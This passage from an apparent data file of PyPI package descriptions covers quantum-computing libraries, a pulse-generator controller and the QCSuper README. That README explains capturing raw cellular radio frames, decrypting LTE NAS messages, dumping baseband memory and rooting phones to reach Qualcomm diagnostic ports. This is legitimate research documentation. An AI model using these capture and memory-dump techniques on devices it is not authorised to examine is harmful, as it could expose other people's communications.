pyQuil from source, clone this repository,cdinto it, and run:pip install -e .Connecting to Rigetti ForestpyQuil can be used to build and manipulate Quil programs without restriction. However, to run\nprograms (e.g., to get wavefunctions, get multishot experiment data), you will need an API key\nforRigetti Forest. This will allow you to run your programs on the\nRigetti Quantum Virtual Machine (QVM) or on a real quantum processor (QPU).Once you have your key, run the following command to automatically set up your config:pyquil-config-setupYou can also create the configuration file manually if you'd like and place it at~/.pyquil_config.\nThe configuration file is in INI format and should contain all the information required to connect to Forest:[Rigetti Forest]\nkey: \nuser_id: You can change the location of this file by setting thePYQUIL_CONFIGenvironment variable.If you encounter errors or warnings trying to connect to Forest then see the fullGetting Started GuideExamples using the Rigetti QVMHere is how to construct a Bell state program and how to compute the amplitudes of its wavefunction:>>>frompyquil.quilimportProgram>>>frompyquil.apiimportQVMConnection>>>frompyquil.gatesimport*>>>qvm=QVMConnection()>>>p=Program(H(0),CNOT(0,1))>>>qvm.wavefunction(p).amplitudesarray([0.7071067811865475+0j,0j,0j,0.7071067811865475+0j])How to do a simulated multishot experiment measuring qubits 0 and 1 of a Bell state. 
(Of course,\neach measurement pair will be00or11.)>>>frompyquil.quilimportProgram>>>frompyquil.apiimportQVMConnection>>>frompyquil.gatesimport*>>>qvm=QVMConnection()>>>p=Program()>>>p.inst(H(0),...CNOT(0,1),...MEASURE(0,0),...MEASURE(1,1))>>>print(p)H0CNOT01MEASURE0[0]MEASURE1[1]>>>qvm.run(p,[0,1],10)[[0,0],[1,1],[1,1],[0,0],[0,0],[1,1],[0,0],[0,0],[0,0],[0,0]]CommunityJoin the public Forest Slack channel athttp://slack.rigetti.com.The following projects have been contributed by community members:Syntax Highlighting for Quilcontributed byJames WeaverWeb Based Circuit Simulatorcontributed byRavisankar A VQuil in Javascriptcontributed byNick DoironQuil in Javacontributed byVictory OmoleDeveloping PyQuilTo make changes to PyQuil itself seeDEVELOPMENT.mdfor instructions on development and testing.How to cite pyQuil and ForestIf you use pyQuil, Grove, or other parts of the Rigetti Forest stack in your research, please cite it as follows:BibTeX:@misc{1608.03355,\n title={A Practical Quantum Instruction Set Architecture},\n author={Smith, Robert S and Curtis, Michael J and Zeng, William J},\n journal={arXiv preprint arXiv:1608.03355},\n year={2016}\n}Text:R. Smith, M. J. Curtis and W. J. Zeng, \"A Practical Quantum Instruction Set Architecture,\" (2016), \n arXiv:1608.03355 [quant-ph], https://arxiv.org/abs/1608.03355"} +{"package": "qcs-api-client", "pacakge-description": "QCS API ClientA client library for accessing theRigetti QCS API.UsageSynchronous Usagefromqcs_api_client.clientimportbuild_sync_clientfromqcs_api_client.modelsimportListReservationsResponsefromqcs_api_client.operations.syncimportlist_reservationswithbuild_sync_client()asclient:response:ListReservationsResponse=list_reservations(client=client).parsedAsynchronous Usagefromqcs_api_client.clientimportbuild_async_clientfromqcs_api_client.modelsimportListReservationsResponsefromqcs_api_client.operations.asyncioimportlist_reservations# Within an event loop:asyncwithbuild_async_client()asclient:response:ListReservationsResponse=awaitlist_reservations(client=client).parsedConfigurationBy default, initializing your client withbuild_sync_clientorbuild_async_clientwill\nuseQCSClientConfiguation.loadto load default configuration values. This function accepts:A profile name (env:QCS_PROFILE_NAME). The name of the profile referenced in your settings\nfile. If not provided,QCSClientConfiguation.loadwill evaluate this to adefault_profile_nameset in your settings file or \"default\".A settings file path (env:QCS_SETTINGS_FILE_PATH). A path to the current user's settings file in TOML format. If not provided,QCSClientConfiguation.loadwill evaluate this to~/.qcs/settings.toml.A secrets file path (env:QCS_SECRETS_FILE_PATH). A path to the current user's secrets file in TOML format. If not provided,QCSClientConfiguation.loadwill evaluate this to~/.qcs/secrets.toml. 
The user should have write access to this file, as the client will attempt to update the file with refreshed access tokens as necessary.If you need to specify a custom profile name or path you can initialize your client accordingly:fromqcs_api_client.clientimportbuild_sync_client,QCSClientConfigurationfromqcs_api_client.modelsimportListReservationsResponsefromqcs_api_client.operations.syncimportlist_reservationsconfiguration=QCSClientConfiguration.load(profile_name='custom',secrets_file_path='./path/to/custom/secrets.toml',settings_file_path='./path/to/custom/settings.toml',)withbuild_sync_client(configuration=configuration)asclient:response:ListReservationsResponse=list_reservations(client=client).parsedDevelopmentThe source code for this repository is synchronized from another source. No commits made directly to GitHub will be retained."} +{"package": "qcsapphire", "pacakge-description": "Quantum Composer Sapphire 9200 Pulser ControlHelper code to communicate withQuantum Composer's\nSapphire 9200 TTL pulse generator.This code facilitates connections to the device, communication, error handling and system status.Installationpip install qcsapphireUsageDetermine the portimportqcsapphireqcsapphire.discover_devices()Will return a list of ports and information about devices connected to those ports.\nFor example, on *nix platforms, you may see[['/dev/cu.BLTH','n/a','n/a'],['/dev/cu.Bluetooth-Incoming-Port','n/a','n/a'],['/dev/cu.usbmodem141101','QC-Pulse Generator','USB VID:PID=04D8:000A LOCATION=20-1.1']]The device here is connected to\\dev\\cu.usbmodem141101.On Windows you may see[['COM3','Intel(R) Active Management Technology - SOL (COM3)','PCI\\\\VEN_8086&DEV_43E3&SUBSYS_0A541028&REV_11\\\\3&11583659&1&B3'],['COM5','USB Serial Device (COM5)','USB VID:PID=0483:A3E5 SER=206A36705430 LOCATION=1-2:x.0'],['COM6','USB Serial Device (COM6)','USB VID:PID=04D8:000A SER= LOCATION=1-8:x.0'],['COM7','USB Serial Device (COM7)','USB VID:PID=239A:8014 SER=3B0D07C25831555020312E341A3214FF LOCATION=1-6:x.0']]It is certainly not obvious to which USB port the QC Sapphire is connected. However,\nusing the Windows Task Manager, as well as trial and error, should eventually\nreveal the correct serial port to use. In this case,COM6.Connection to Pulserpulser=qcsapphire.Pulser('COM6')CommunicationFor normal usage, all commands sent to the device should use thequery()method or\nwith property-like calls (see section below).Thequery()method will write a command, read the response from the device,\ncheck for errors (raising an Exception when an error is found) and return the string\nresponse. 
For example,ret_val=pulser.query(':PULSE0:STATE?')print(ret_val)'0'ret_val=pulser.query(':PULSE1:WIDTH 0.000025')print(ret_val)'ok'ret_val=pulser.query(':PULSE1:WIDTH?')print(ret_val)'0.000025000'Property-Like CallsIt's possible to make the same calls to the pulser using a property-like call.\nInstead of callingpulser.query(\"command1:subcommand:subsubcommand value\"),\none can callpulser.command1.subcommand.subsubcommand(value), which is more readable.For example,ret_val=pulser.pulse1.width(0.000025)#sets the width of channel Aprint(ret_val)# 'ok'width=pulser.pulse1.width()#asks for the width of channel Aprint(width)# '0.000025000'All of the SCPI commands can be built this way.In either case, the user is responsible\nfor sending the correct command strings by followingthe API.\nIt should be pointed out there is no need to worry about string encoding and carriage returns / line feeds,\nas that is taken care of by the code.Programming ChannelsInstead of using 'pulseN' to access a particular QCSapphire channel, methods have\nbeen added to facilitate more programmatic ways of control.Global and Channel StatesTwo methods exist to report on global and channel settingsGlobal Settingsimportpprintpp=pprint.PrettyPrinter(indent=4)pp.pprint(pulser.report_global_settings())Channel Settingsforchannelinrange(1,5):pp.pprint(f'channel{channel}')pp.pprint(pulser.report_channel_settings(channel))ExamplesThe following examples demonstrate both simple and advanced usage.ResetsThe QCSapphire can be unstable at times. We have found that forcing the\nsystem to reset, multiple times, is necessary to program the pulser the\nthe ways described below. You may or may-not have better stability\nif you reset the pulser before programming.foriinrange(2):pulser.set_all_state_off()time.sleep(1)pulser.query('*RST')pulser.system.mode('normal')CWODMRIn CWODMR our spin system is continuously illuminated with an optical pump,\nwhile an oscillating (RF) magnetic field drives magnetic transitions between\nspin states. While the optical pump is continuously on, we can use the QCSapphire\nto control the RF magnetic signal timing. The RF signal hardware will control\nthe frequency of the field (for NV centers, between 2.6 and 3.2 GHz, depending on\nthe level of Zeeman splitting). The QCSapphire's TTL output may operate a\nswitch that blocks the RF signal at known times. This allows the experimenter\nto acquire photo luminescence (PL) signal for periods when no RF signal is applied\nin order to measure a background, and to then measure PL when the RF is applied.In this case, we wish to program the QCSapphire to output a TTL signal of fixed\nduration and period. The following example shows how to generate a 5 microsecond on/off TTL signal.Simple Example: Single ChannelIn the simple case, we just have a single channel ('B') that we wish to use to\ngenerate a square wave. The documentation is straight-forward here. 
NB: channel 'B' is demonstrated here because we use channel 'A' to control the optical pumping in other experiments (pulsed-ODMR, Rabi, etc.).

total_width = 10e-6  # in seconds
pulser.system.period(total_width)
# use channel B for the RF switch and use 'normal' mode
channel = pulser.channel('B')
channel.mode('normal')
# create a 5 microsecond pulse
# round to the nearest 10 ns because the QCSapphire does not behave well with machine errors
channel.width(np.round(total_width/2, 8))
channel.delay(0)
pulser.system.state(1)  # start the pulser

Realistic Example: Adding Clock and Trigger Channels

In order to take robust data, however, we need to control our data acquisition system (DAQ). Supplying an external clock and trigger signal from the QCSapphire ensures that the DAQ and pulser do not drift from each other and data is acquired at the exact moment the system is ready. However, this changes how we must program the RF on/off to be 5 microseconds in width. The following steps through the necessary calls to produce:
- a 200 ns clock period
- a 5 microsecond on/off RF pulse
- a single trigger pulse at the start of every 10 microsecond period

First the Clock

In this example, channel 'C' is programmed to act as the clock. The pulser system clock period is set to the smallest allowed value in order to set our clock tick leading-edge period to 200 ns. This channel is programmed exactly as in the simple case above, with a smaller width.

clock_period = 200e-9
pulser.system.period(clock_period)
channel = pulser.channel('C')
channel.mode('normal')
channel.width(np.round(clock_period/2, 8))  # 100 ns wide square wave
channel.delay(0)

Add RF switch

A 5 microsecond wide (positive) pulse, followed by 5 microseconds off, on channel B is implemented using the duty-cycle mode. In the duty-cycle mode, we specify the number of clock_periods ON during which the channel generates the signal we describe, and then how many clock_periods OFF until the pattern repeats. In this case channel B is programmed to output a 5 microsecond wide pulse ONE time and then wait the appropriate number of clock_periods such that the start of the next 5 microsecond wide pulse occurs 10 microseconds later. Thus, the OFF duty cycle will be 10 µs / clock_period - 1 (with the 200 ns clock period used here, that is 50 - 1 = 49 OFF cycles).

rf_pulse_width = 5e-6
full_pulse_sequence_period = 2 * rf_pulse_width
n_on_cycles = 1
n_off_cycles = np.round(full_pulse_sequence_period/clock_period).astype(int) - n_on_cycles
channel = pulser.channel('B')
channel.mode('dcycle')
channel.width(np.round(rf_pulse_width, 8))  # 5 µs wide square wave
channel.delay(0)
channel.pcounter(n_on_cycles)
channel.ocounter(n_off_cycles)

When data are acquired, the first 5 microseconds will be the 'signal', where we expect a dip in PL, and the second 5 microseconds will be the 'background', where no RF signal is present and we expect full PL intensity.

Add Trigger

We now want to produce a single square wave output on channel D at the beginning of each 10 microsecond period. This will be used to trigger our DAQ.
Again, we use the duty-cycle mode.

trigger_width = 100e-9
n_on_cycles = 1
n_off_cycles = np.round(full_pulse_sequence_period/clock_period).astype(int) - n_on_cycles
channel = pulser.channel('D')
channel.mode('dcycle')
channel.width(np.round(trigger_width, 8))  # 100 ns wide square wave
channel.delay(0)
channel.pcounter(n_on_cycles)
channel.ocounter(n_off_cycles)

Set the Channel States

We finally set the states of the channels and system to start the sequence.

pulser.channel('B').state(1)
pulser.channel('C').state(1)
pulser.channel('D').state(1)
pulser.system.state(1)

Rabi Oscillation / pulsed-ODMR Programming

In pulsed-ODMR, one separates the optical pumping from the application of the RF magnetic field signal. In a Rabi oscillation experiment, the width of the RF signal is varied as the PL contrast to background is measured. Both of these pulse sequences are similar to each other, and both are more complicated than the example above.

The main difference between the CWODMR pulses above and Rabi/pulsed-ODMR sequences is that an appropriate delay to the RF pulse is added and channel A is used to control the optical pump/readout. The RF pulse must come after the initial optical pump.

The full sequence is an optical pump signal (~5 microseconds), followed by an RF signal of some duration, followed by an optical readout (~5 microseconds), followed by some period with no RF or optical pump. A description of this sequence, though done with a lock-in amplifier, is found here. Here too, the duty-cycle mode is used: the RF channel (B) is programmed to generate a delayed signal, of some width, ONE time, and then wait M clock cycles before the next signal, where M = full_pulse_sequence_period / clock_period - 1.

An example of this sequence is found in the QT3 lab experimental code. Additionally, as can be seen in the code above, some extra delay after the optical pump was added because of a finite hardware response time of ~700-900 ns.

Trigger Pulses on Channel A via Software Trigger

Here's an example of using an external trigger to generate an output pulse from the QCSapphire. This may be very useful when used in combination with a device that has more output channels and more sophisticated pulse sequence programming, such as the Spin Core Pulse Blaster. One of the Pulse Blaster's output channels could be used to trigger the external trigger channel of the QCSapphire. One reason to do this would be to utilize the QCSapphire's superior pulse width resolution: the smallest square wave from the Pulse Blaster is 50 ns, while the QCSapphire can produce a 10 ns wide pulse (according to its documentation).

### TODO -- check this code!
It doesn't look right.pulser.channel('A').mode('single')#pulser.channel('A').cmode('single') #do we need cmode instead of mode?pulser.channel('A').period(0.2)#200 ms system pulsepulser.channel('A').external.mode('trigger')pulser.channel('A').width(10e-9)#10 ns wide pulse#pulser.channel('B').cmode('single')#pulser.channel('B').polarity('normal')#pulser.channel('B').width(10e-9) #10 ns wide pulse#pulser.channel('B').state(0)pulser.channel('A').state(0)#trigger loop example#wait N seconds between triggerswait_N=5.0N_pulses=50#activate pulser and output channelpulser.channel('A').state(1)#pulser.channel('B').state(1)foriinrange(N_pulses):pulser.software_trigger()#trigger the pulsertime.sleep(wait_N)#deactivatepulser.channel('A').state(0)#pulser.channel('B').state(0)DebuggingIf you hit an error, especially when trying to use the property-like calls,\nthe last string written to the Serial port is found in the.last_write_commandattribute of the pulser object.pulser.channle('B').width(25e-6)print(pulser.last_write_command)# ':PULSE1:WIDTH 2.5e-05'Additionally, you can see the recent command history of the object (last 1000 commands)forcommandinpulser.command_history():print(command)LICENSELICENCEAcknowledgmentsThePropertyclass of this code was taken fromeasy-scpi:https://github.com/bicarlsen/easy-scpiand modified."} +{"package": "qcSim", "pacakge-description": "qcSim is a Python package for the simulation of quantum computers based on the\nquantum circuit model.\nThe goal of this simulator is to provide a simple and understandable syntax that allows\neven people who have only recently started working with quantum computing to implement\nsimple quantum algorithms. This rather practical component should make it easier for\nbeginners to understand the complex topic of quantum computing.\nThe simulator was primarily programmed to implement quantum machine learning and quantum\noptimization subroutines. Some examples can be found in the folder \u201cexample subroutines\u201d.\nThe focus was to clearly show the lower time complexity of quantum algorithms compared\nto their classical counterparts."} +{"package": "qcs-phy", "pacakge-description": "QCS is an open-source Python code that allows to study the single-photon transmission and reflection, as well as the nth-order equal-time correlation functions (ETCFs) in driven-dissipative quantum systems."} +{"package": "qcs-sdk-python", "pacakge-description": "QCS SDK Python\u26a0\ufe0f In Developmentqcs-sdk-pythonprovides an interface to RigettiQuantum Cloud Services(QCS), allowing users\nto compile and run Quil programs on Rigetti quantum processors. Internally, it is powered by theQCS Rust SDK.While this package can be used directly,pyQuiloffers more functionality and a\nhigher-level interface for building and executing Quil programs. This package is still in early development and breaking changes should be expected between minor versions.DocumentationDocumentation for the current release ofqcs_sdkis publishedhere. Every version ofqcs_sdkshipswith type stubsthat can provide type hints and documentation to Python tooling and editors.TroubleshootingEnabling Debug loggingThis package integrates with Python'slogging facilitythrough a Rust crate calledpyo3_log. The quickest way to get started is to just enable debug logging:importlogginglogging.basicConfig(level=logging.DEBUG)Because this is implemented with Rust, there are some important differences in regards to log levels and filtering.TheTRACElog levelRust has aTRACElog level that doesn't exist in Python. 
It is less severe thanDEBUGand is set to a value of 5. While theDEBUGlevel is recommended for troubleshooting, you can choose to targetTRACElevel logs and below like so:importlogginglogging.basicConfig(level=5)Runtime Configuration and Cachingpyo3_logcaches loggers and their level filters to improve performance. This means that logger re-configuration done at runtime may cause unexpected logging behavior in certain situations. If this is a concern,this section of the pyo3_log documentationgoes into more detail.These caches can be reset using the following:qcs_sdk.reset_logging()This will allow the logging handlers to pick up the most recently-applied configuration from the Python side.Filtering LogsBecause the logs are emitted from a Rust library, the logger names will correspond to the fully qualified path of the Rust module in the library where the log occurred. These fully qualified paths all have their own logger, and have to be configured individually.For example, say you wanted to disable the following log:DEBUG:hyper.proto.h1.io:flushed 124 bytesYou could get the logger forhyper.proto.h1.ioand disable it like so:logging.getLogger(\"hyper.proto.h1.io\").disabled=TrueThis can become cumbersome, since there are a handful of libraries all logging from a handful of modules that you may not be concerned with. A less cumbersome, but more heavy handed approach is to apply a filter to all logging handlers at runtime. For example, if you only cared about logs from aqcslibrary, you could setup a log filter like so:classQCSLogFilter(logging.Filter):deffilter(self,record)->bool:return\"qcs\"inrecord.nameforhandlerinlogging.root.handlers:handler.addFilter(QCSLogFilter())This applies to all logs, so you may want to tune thefiltermethod to include other logs you care about. See the caching section above for important information about the application of these filters."} +{"package": "qc.statusmessage", "pacakge-description": "IntroductionSometimes in web application development the need arises to show a status message\nor similar notices to a user. 
This can of course be easily done in some success page\nbut sometimes this page is rendered by a different request because of a redirect.\nIn these cases you can use some query parameters or similar methods but that\u2019s not\nalways easy to use or might even have security problems.qc.statusmessagetries to solve this problem by giving you aMessageListobject\nwhich is put into the WSGI environment on ingress and processed on egress to store a list of\nmessages inside a cookie.For information on how to use it check out theonline documentationor\ncheck out thesource code repository.ChangelogNext release1.0b3 - July 20th 2009Bugfixesfixed link to PyPI package in documentation [cs]fixed handling of broken cookies [cs]1.0b1 - March 15th 2009Initial release"} +{"package": "qcSubroutines", "pacakge-description": "qcSubroutines is a Python package containing some quantum subroutines.\nCombined with qcSim, a tool for the simulation of quantum computers, these subroutines can be used to build quantum algorithms."} +{"package": "qcsuper", "pacakge-description": "QCSuperQCSuperis a tool communicating with Qualcomm-based phones and modems, allowing tocapture raw 2G/3G/4G(and for certain models 5G) radio frames, among other things.It will allow you togenerate PCAPcaptures of it using either a rooted Android phone, an USB dongle or an existing capture in another format.After havinginstalledit, you can plug your rooted phone in USB and using it, with a compatible device, is as simple as:./qcsuper.py --adb --wireshark-liveOr, if you have manually enabled exposing a Diag port over your phone (the corresponding procedure may vary depending on your phone modem and manufacturer, see below for more explanations), or if you have plugged a mobile broadband dongle:./qcsuper.py --usb-modem auto --wireshark-liveIt uses the Qualcomm Diag protocol, also called QCDM or DM (Diagnostic Monitor) in order to communicate with your phone's baseband.You are willing to report that your device works or does not work? You can open aGithub issue.Table of contentsInstallationUbuntu and Debian installationWindows installationSupported protocolsUsage noticeAnnexes:Using QCSuper with an USB modemSupported devicesRelated tools using the Diag protocolBlog post/demo:Presenting QCSuper: a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phonesMore documentation:The Diag protocolQCSuper architectureInstallationQCSuper was lately tested and developed on Ubuntu LTS 22.04 and also has been used over Windows 11. It depends on a few Python modules. It is advised to use Linux for better compatibility.To use it, your phone must be rooted or expose a diag service port over USB. In order to check for compatibility with your phone, look up the phone's model on a site likeGSMArenaand check whether it has a Qualcomm processor.In order to open PCAP files produced by QCSuper, you can use any Wireshark 2.x - 4.x for 2G/3G frames, but you need at least Wireshark 2.5.x for 4G frames (and 2.6.x for individual NAS messages decrypted out of 4G frames). 
Ubuntu currently provides a recent enough build for all versions.Decoding 5G frames was tested under Wireshark 3.6.x and will be done through automatically installing a Wireshark Lua plug-in (in%APPDATA%\\Wireshark\\pluginsunder Windows or in~/.local/lib/wireshark/pluginsunder Linux and macOS), which can be avoided through setting theDONT_INSTALL_WIRESHARK_PLUGIN=1environment variable if you are willing to avoid this.Ubuntu and Debian installationIn order to install the stable version of QCSuper system-wide from PyPI, you can run these commands:# Install dependenciessudoaptinstallpython3-pipwireshark# Install stable QCSuper system-widesudopip3install--upgradeqcsuperThen, you can just typeqcsuperin your terminal to run QCSuper. (Use this anywhere in place of where./qcsuper.pyis written below.)In order to install the development version in a specific folder, open a terminal and type the following:# Download QCSupergitclonehttps://github.com/P1sec/QCSuper.gitqcsupercdqcsuper# Install dependenciessudoaptinstallpython3-pipwireshark\nsudopip3install--upgradepyserialpyusbcrcmodhttps://github.com/P1sec/pycrate/archive/master.zipThen, run QCSuper from theqcsuper/directory, using the./qcsuper.pycommand in the terminal.Windows installationQCSuper can run on Windows, but you should beforehand ensure that Google's ADB prompt correctly runs on your machine with your device, and you should as well manually createlibusb-win32filters (through the utility accessible in the Start Menu after installing it) in the case where your device directly needs to connect to the Diag port over pseudo-serial USB.(Please note that if you mode-switch your device, the associated USB PID/VID may change and it may require to redo driver associations in thelibusb-win32filter creation utility - and/or in the Windows peripherial devices manager depending on the case)On Windows, you may need (in addition to Google's ADB kernel drivers) to download and install your phone's USB drivers from your phone model (this may include generic Qualcomm USB drivers). Please search for your phone's model + \"USB driver\" or \"ADB driver\" on Google for instructions.Then, you need to ensure that you can reach your device usingadb. You can find a tutorial on how to download and setupadbhere. Theadb.exe shell(or whatever executable path you use, a copy of the ADB executable is present in theqcsuper/inputs/external/adbfolder of QCSuper) command must display a prompt to continue.Then, follow these links (the tool has been tested lately on Windows 11 - it is not guaranteed to work on Windows 7) in order to:Install Python 3.12(Windows 7 version:Python 3.7) or more recent (be sure to check options to include it into PATH, install it for all users and install pip)Install Wireshark 4.2(Windows 7 version:Install Wireshark 3.6) or more recentInstall libusb-win32 1.2.7.3(Windows 7 version:libusb-win32 1.2.3.7) or more recentRestart your command prompt/terminal in order to ensure that the%PATH%system variable has been updated.Download and extract QCSuperTo install the required Python modules, open your command prompt and type:pip3install--upgradepyserialpyusbcrcmodhttps://github.com/P1sec/pycrate/archive/master.ziphttps://github.com/pyocd/libusb-package/archive/master.zipStill in your command prompt, move to the directory containing QCSuper using thecdcommand. 
You can then execute commands (which should start withpy qcsuper.pyorpy3 qcsuper.pyif you installed Python 3 from the online installer, orpython3.exe .\\qcsuper.pyif you installed it from the Windows Store).As noted above, it is possible that you have to add alibusb-win32filter through the utility available in the Start Menu in order to ensure that the interface corresponding to the Diag port is visible by QCSuper on the mode-switched device (a first failed attempt to run the tool using the--adbflag should trigger a mode-switch if the ADB driver is working and the device is correctly rooted).Supported protocolsQCSuper supports capturing a handful of mobile radio protocols. These protocols are put after aGSMTAP header, a standard header (encapsulated into UDP/IP) permitting to identify the protocol, and GSMTAP packets are put into aPCAP filethat is fully analyzable using Wireshark.2G/3G/4G protocols can be broken into a few \"layers\": layer 1 is about the digital radio modulation and multiplexing, layer 2 handles stuff like fragmentation and acknowledgement, layer 3 is the proper signalling or user data.QCSuper allows you most often to capture on layer 3, as it is the most pratical to analyze using Wireshark, and is what the Diag protocol provides natively (and some interesting information is here).2G (GSM): Layer 3 and upwards (RR/...)2.5G (GPRS and EDGE): Layer 2 and upwards (MAC-RLC/...) for data acknowledgements3G (UMTS): Layer 3 and upwards (RRC/...)Additionally, it supports reassembling SIBs (System Information Blocks, the data broadcast to all users) in separate GSMTAP frames, as Wireshark currently can't do it itself: flag--reassemble-sibs4G (LTE): Layer 3 and upwards (RRC/...)Additionally, it supports putting decrypted NAS message, which are embedded encrypted embedded into RRC packet, in additional frames: flag--decrypt-nasBy default, the IP traffic sent by your device is not included, you see only the signalling frames. 
You can include the IP traffic you generate using the--include-ip-trafficoption (IP being barely the layer 3 for your data traffic in 2G/3G/4G, at the detail that its headers may be compressed (ROHC) and a tiny PPP header may be included).The data traffic you send uses a channel different from the signalling traffic, this channed is setup through the signalling traffic; QCSuper should thus show you all details relevant to how this channel is initiated.Usage noticeIn order to use QCSuper, you specify one input (e.g:--adb(Android phone),--usb-modem) and one or more modules (--wireshark-livefor opening Wireshark,--pcap-dumpfor writing traffic to a PCAP file,--infofor generic information about the device...).A few commands you can type are:# Open Wireshark directly, using a rooted Android phone as an input,# for compatible phones:$./qcsuper.py--adb--wireshark-live# Same, but dump to a PCAP file instead of opening Wireshark directly$./qcsuper.py--adb--pcap-dump/tmp/my_pcap.pcapOr, if it is not simple enough to work:# Same, but using an USB modem/phone exposing a Diag serial port# directly over USB, in the case where the \"--adb\" mode does not# work directly:# - With a compatible Android phone where the Diag port over USB has# been manually enabled by the user (see the \"How to manually enable# the diagnostic ports on my phone\" section below for a summary of# how this may be possible with most Qualcomm-based models)## In this case, you may try:./qcsuper.py--usb-modemauto--wireshark-live# Or, if selecting manually the USB device corresponding to the# Diag-enabled phone turns to be requried:$lsusb(..)Bus001Device076:ID05c6:9091Qualcomm,Inc.IntexAquaFish&JollaCDiagnosticMode\n$./qcsuper.py--usb-modem1d6b:0003--wireshark-live# With vendor ID:product ID...$./qcsuper.py--usb-modem002:001--wireshark-live# ...or with bus ID:device ID# Or, if selecting the configuration number and interface number (referred as \"bConfigurationValue\" and \"bInterfaceNumber\" in the USB desciprtors) turn to be required:$lsusb-v(..)$./qcsuper.py--usb-modem1d6b:0003:1:0--wireshark-live# With vendor ID:product ID:configuration:interface...$./qcsuper.py--usb-modem002:001:1:0--wireshark-live# ...or with bus ID:device ID:configuration:interface# - With a generic serial-over-USB device where the \"usbserial\" module has# loaded a /dev/ttyUSB{0-9} device corresponding to the diagnostic port:$sudo./qcsuper.py--usb-modem/dev/ttyUSB2--wireshark-live# - With an Option device where the \"hsoserial\" module has loaded a# /dev/ttyHS{0-9} device corresponding to the diagnostic port:$sudo./qcsuper.py--usb-modem/dev/ttyHS2--wireshark-liveHere is the current usage notice for QCSuper:usage: qcsuper.py [-h] [--cli] [--efs-shell] [-v] (--adb | --adb-wsl2 ADB_WSL2 | --usb-modem TTY_DEV | --dlf-read DLF_FILE | --json-geo-read JSON_FILE) [--info]\n [--pcap-dump PCAP_FILE] [--wireshark-live] [--memory-dump OUTPUT_DIR] [--dlf-dump DLF_FILE] [--json-geo-dump JSON_FILE] [--decoded-sibs-dump]\n [--reassemble-sibs] [--decrypt-nas] [--include-ip-traffic] [--start MEMORY_START] [--stop MEMORY_STOP]\n\nA tool for communicating with the Qualcomm DIAG protocol (also called QCDM or DM).\n\noptions:\n -h, --help show this help message and exit\n --cli Use a command prompt, allowing for interactive completion of commands.\n --efs-shell Spawn an interactive shell to navigate within the embedded filesystem (EFS) of the baseband device.\n -v, --verbose Add output for each received or sent Diag packet.\n\nInput mode:\n Choose an one least input mode for DIAG 
data.\n\n --adb Use a rooted Android phone with USB debugging enabled as input (requires adb).\n --adb-wsl2 ADB_WSL2 Unix path to the Windows adb executable. Equivalent of --adb command but with WSL2/Windows interoperability.\n --usb-modem TTY_DEV Use an USB modem exposing a DIAG pseudo-serial port through USB.\n Possible syntaxes:\n - \"auto\": Use the first device interface in the system found where the\n following criteria is matched, by order of preference:\n - bInterfaceClass=255/bInterfaceSubClass=255/bInterfaceProtocol=48/bNumEndpoints=2\n - bInterfaceClass=255/bInterfaceSubClass=255/bInterfaceProtocol=255/bNumEndpoints=2\n - usbserial or hso device name (Linux/macOS): \"/dev/tty{USB,HS,other}{0-9}\"\n - COM port identifier (Windows): \"COM{0-9}\"\n - \"vid:pid[:cfg:intf]\" (vendor ID/product ID/optional bConfigurationValue/optional\n bInterfaceNumber) format in hexa: e.g. \"05c6:9091\" or \"05c6:9091:1:0 (vid and pid\n are four zero-padded hex digits, cfg and intf are canonical values from the USB\n descriptor, or guessed using the criteria specified for \"auto\" above if not specified)\n - \"bus:addr[:cfg:intf]\" (USB bus/device address/optional bConfigurationValue/optional\n bInterfaceNumber) format in decimal: e.g \"001:003\" or \"001:003:0:3\" (bus and addr are\n three zero-padded digits, cfg and intf are canonical values from the USB descriptor)\n --dlf-read DLF_FILE Read a DLF file generated by QCSuper or QXDM, enabling interoperability with vendor software.\n --json-geo-read JSON_FILE\n Read a JSON file generated using --json-geo-dump.\n\nModules:\n Modules writing to a file will append when it already exists, and consider it Gzipped if their name contains \".gz\".\n\n --info Read generic information about the baseband device.\n --pcap-dump PCAP_FILE\n Generate a PCAP file containing GSMTAP frames for 2G/3G/4G, to be loaded using Wireshark.\n --wireshark-live Same as --pcap-dump, but directly spawn a Wireshark instance.\n --memory-dump OUTPUT_DIR\n Dump the memory of the device (may not or partially work with recent devices).\n --dlf-dump DLF_FILE Generate a DLF file to be loaded using QCSuper or QXDM, with network protocols logging.\n --json-geo-dump JSON_FILE\n Generate a JSON file containing both raw log frames and GPS coordinates, for further reprocessing. 
To be used in combination with --adb.\n --decoded-sibs-dump Print decoded SIBs to stdout (experimental, requires pycrate).\n\nPCAP generation options:\n To be used along with --pcap-dump or --wireshark-live.\n\n --reassemble-sibs Include reassembled UMTS SIBs as supplementary frames, also embedded fragmented in RRC frames.\n --decrypt-nas Include unencrypted LTE NAS as supplementary frames, also embedded ciphered in RRC frames.\n --include-ip-traffic Include unframed IP traffic from the UE.\n\nMemory dumping options:\n To be used along with --memory-dump.\n\n --start MEMORY_START Offset at which to start to dump memory (hex number), by default 00000000.\n --stop MEMORY_STOP Offset at which to stop to dump memory (hex number), by default ffffffff.Specifying-to pipe data from stdin or towards stdout is supported (gzipped content may not be detected).How to root my phone?This README file is not a guide over how to root your phone (getting your phone to enable you to run commands such as \"su\").In most of the recent Android devices, you must first use the \"OEM/bootloader unlock\" option prevent in the developer settings of the telephone in order to unlock the bootloader, then you may use a tool such asMagiskthat will enable you to obtain a patched image for your phone's bootloader, that you will then be able to load onto your phone infastbootmode.QCSuper will have more chance to work easily on your Qualcomm-based device when your phone is rooted, but there often are ways to enable the Qualcomm Diag USB mode (also known as \"DM\", Diag Monitor) on your phone without having your phone rooted. Thisdepends onyour phone vendor and goes through, for example, typing a magic combination of digits onto your phone's dialer keypad. Please see the \"How to manually enable the diagnostic ports on my phone?\" section below for more details.Before rooting your phone, remember that you may also want to use load an alternate recovery image such as TWRP onto your OEM-unlocked phone in order to perform partition backup using a tool such asTWRP(it may be as simple as loading the image through Fastboot, enabling the ADB link in the settings of TWRP, and usingadb pullonto selected partitions in the/dev/block/by-namefolder`).For specific inscriptions on rooting or enabling the Diag mode on your phone model, you may search the information over the XDA-developers forum with appropriate keywords.How to manually enable the diagnostic ports on my phone?On Qualcomm/MSM Android-based devicesbearing Linux kernel 4.9 or earlier(this includes roughly part of devices up to Android 12 and all devices before Android 10), Qualcomm-based Android devices normallycontain a system device called/dev/diagwhich allows to communicate data to the diagnostics port of the baseband.On Qualcomm/MSM Android-based devicesbearing Linux kernel 4.14 or later(this includes roughly part of devices from Android 10 and all devices from Android 13),/dev/diagdisappeared, as the correspondingdiagcharmodule is disabled by default recent AOSP/Linux kernels.On the devicesbearing a 